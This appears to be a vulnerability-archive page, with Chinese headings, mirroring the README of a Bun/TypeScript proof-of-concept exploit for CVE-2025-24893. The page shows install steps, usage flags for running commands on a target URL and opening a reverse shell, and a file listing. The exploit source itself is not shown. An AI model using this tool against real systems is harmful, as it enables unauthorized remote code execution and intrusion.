关联漏洞
介绍
# CVE-2025-24893
Install bun:
```bash
curl -fsSL https://bun.com/install | bash
```
To install dependencies:
```bash
bun install
```
To run:
```bash
bun run CVE-2025-24893.ts
```
This project was created using `bun init` in bun v1.2.19. [Bun](https://bun.com) is a fast all-in-one JavaScript runtime.
## How to use:
```
Usage: bun CVE-2025-24893.ts [options]
Options:
-u, --url <url> The target URL to interact with.
-i, --ip <ip-address> The IP address for a reverse shell connection.
-p, --port <port-number> The port number for the reverse shell.
-r, --rverse Open a reverse shell connection.
-c, --cmd <command> Execute a specific command.
Examples:
# Execute a command on a target URL
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
# Open a reverse shell
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
```
## Disclaimer
This exploit and guide are for educational purposes only. Use this information responsibly and only on systems you have explicit permission to test. Unauthorized exploitation of systems is illegal and unethical. The authors and contributors are not responsible for any misuse or damage caused by this information.
文件快照
[4.0K] /data/pocs/4828a0fb01ab8d58d59eae599d386d51315a06b1
├── [5.3K] bun.lock
├── [3.6K] CVE-2025-24893.ts
├── [4.0K] fancy
│ └── [8.7K] fancier.ts
├── [2.9K] index.ts
├── [ 316] package.json
├── [1.2K] README.md
└── [ 713] tsconfig.json
1 directory, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。